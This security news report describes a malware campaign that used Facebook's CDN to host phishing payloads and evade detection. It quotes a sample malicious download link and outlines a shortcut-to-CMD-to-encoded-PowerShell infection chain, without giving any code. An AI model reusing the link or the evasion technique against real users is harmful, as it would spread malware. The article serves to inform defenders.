A group of hackers was able to use Facebook CDN (Content Delivery Network) servers to distribute malware and evade detection.
“A content delivery network or content distribution network (CDN) is a geographically distributed network of proxy servers and their data centers. The goal is to distribute service spatially relative to end-users to provide high availability and high performance. CDNs serve a large portion of the Internet content today, including web objects (text, graphics and scripts), downloadable objects (media files, software, documents), applications (e-commerce, portals), live streaming media, on-demand streaming media, and social networks.”
Security researchers from MalwareHunter team discovered many campaigns leveraging Facebook CDN (Content Delivery Network) servers in the last two weeks to bypass security solutions, earlier, the same malware group used Dropbox and Google’s cloud storage services to store the same payloads.
The distribution process begins with victims receiving a fake email from the hackers. The emails act as official communications from local authorities and contain a link.
They use the Facebook CDN because it enables them to avoid security solutions because the domain is trusted by them and the relevant traffic is not blocked. The links point to Facebook’s CDN (Content Delivery Network). The group upload files in groups or different sections, take the file’s URL, and send it to the victims.
The link is something like that:
https://cdn.fbsbx.com/v/t59.2708-21/20952350_119595195431306_4546532236425428992_n.rar/NF-DANFE_FICAL-N-5639000.rar?oh=9bb40a7aaf566c6d72fff781d027e11c&oe=59AABE4D&dl=1
When the victim clicks on the link, a compressed file will be downloaded and once the shortcut executed, it invokes a legitimate application (Command Prompt (CMD)) installed on most windows PC to run an encoded PowerShell script.
